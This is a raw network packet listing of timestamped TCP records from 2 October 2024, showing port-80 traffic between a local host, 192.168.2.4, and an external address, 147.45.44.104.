Oct 2, 2024 09:41:16.239340067 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.239356041 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.239391088 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.239417076 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.239418030 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.239434958 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.239439011 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.239450932 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.239455938 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.239470959 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.239475012 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.239491940 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.239593983 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.240185976 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.240202904 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.240217924 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.240236998 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.240245104 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.240253925 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.240267992 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.240272999 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.240283966 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.240288973 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.240307093 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.240329027 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.240612984 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.240638971 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.240696907 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.240737915 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.240744114 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.240775108 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.240792990 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.240808964 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.240820885 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.240820885 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.240830898 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.240902901 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.241405010 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.241431952 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.241451025 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.241466999 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.241482973 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.241489887 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.241491079 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.241525888 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.241525888 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.241985083 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.242017031 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.242063999 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.242080927 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.242096901 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.242115974 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.242119074 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.242119074 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.242135048 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.242161036 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.242161036 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.242180109 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.242954016 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.242984056 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.243000984 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.243040085 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.243079901 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.243098021 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.243098974 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.243119001 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.243135929 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.243161917 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.243161917 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.243199110 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.243948936 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.243966103 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.243983984 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.244024992 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.244024992 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.313457966 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.313478947 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.313496113 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.313513994 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.313523054 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.313538074 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.313560009 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.313574076 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.313591957 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.313601971 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.313608885 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.313649893 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.313664913 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.313698053 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.313716888 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.314043999 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.314058065 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.314512014 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.322936058 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.322952986 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.322969913 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.322983027 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.323009014 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.323009014 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.323147058 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.323163033 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.323179007 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.323189974 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.323211908 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.323211908 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.323245049 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.323260069 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.323276043 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.323307991 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.323323965 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.323544025 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.323559999 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.323575020 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.323616028 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.323756933 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.323791027 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.323821068 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.323913097 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.327657938 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.327711105 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.327725887 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.327724934 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.327768087 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.327826023 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.327841997 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.327868938 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.327903032 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.327923059 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.327938080 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.327953100 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.327970982 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.327990055 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.328113079 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.328130007 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.328145027 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.328150034 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.328164101 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.328171015 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.328186989 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.328368902 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.328399897 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.328417063 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.328423977 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.328440905 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.328459978 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.328483105 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.328497887 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.328512907 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.328530073 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.328537941 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.328547001 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.328556061 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.328572989 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.328573942 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.328573942 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.328588963 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.328597069 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.328622103 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.329252005 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.329267979 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.329283953 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.329304934 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.329308987 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.329319954 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.329327106 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.329343081 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.329360962 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.329374075 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.329389095 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.329412937 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.329413891 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.329437017 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.329452991 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.329468012 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.329478979 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.329499960 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.329529047 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.330122948 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.330152988 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.330185890 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.330200911 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.330212116 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.330228090 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.330243111 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.330251932 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.330281973 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.330301046 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.330317020 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.330332041 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.330341101 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.330348015 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.330367088 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.330368996 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.330368996 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.330404043 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.333117962 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.333172083 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.333208084 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.333236933 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.333246946 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.333252907 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.333268881 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.333292961 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.333304882 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.333304882 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.333309889 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.333328009 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.333342075 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.333355904 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.333355904 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.333381891 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.333381891 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.333507061 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.333560944 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.333576918 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.333601952 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.333802938 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.333827019 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.333842993 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.333868027 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.333887100 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.333925962 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.333925962 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.334157944 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.334212065 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.334229946 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.334261894 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.334281921 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.334297895 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.334320068 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.334325075 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.334325075 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.334347010 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.334352970 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.334352970 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.334366083 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.334382057 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.334403038 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.334403038 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.334422112 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.335076094 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.335092068 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.335105896 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.335129976 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.335177898 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.335186958 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.335203886 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.335237026 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.335252047 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.335252047 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.335252047 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.335270882 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.335289955 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.335293055 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.335293055 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.335361004 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.335424900 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.335921049 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.336327076 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.403980017 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.403995991 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.404014111 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.404042959 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.404073000 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.404076099 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.404093027 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.404110909 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.404115915 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.404140949 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.404158115 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.404162884 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.404176950 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.404184103 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.404202938 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.404217005 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.404376030 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.404405117 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.404422045 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.404433966 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.404438972 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.404458046 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.404462099 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.404475927 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.404483080 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.404495001 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.404512882 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.404522896 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.404527903 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.404539108 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.404550076 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.404556990 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.404576063 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.404597998 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.404628038 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.404916048 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.404931068 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.404947042 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.404997110 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.405005932 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.405023098 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.405040026 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.405056000 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.405061960 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.405098915 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.405144930 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.405160904 CEST	80	49743	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.405180931 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.405215025 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.413783073 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.413816929 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.413834095 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.413849115 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.413865089 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.413880110 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.413886070 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.413886070 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.413897991 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.413917065 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.413933992 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.413933992 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.413933992 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.413952112 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.413969040 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.413980961 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.413980961 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.414016962 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.414016962 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:16.418577909 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.418626070 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.418642044 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.418658018 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.418684006 CEST	80	49744	147.45.44.104	192.168.2.4
Oct 2, 2024 09:41:16.418704987 CEST	80	49744	147.45.44.104	192.168.2.4
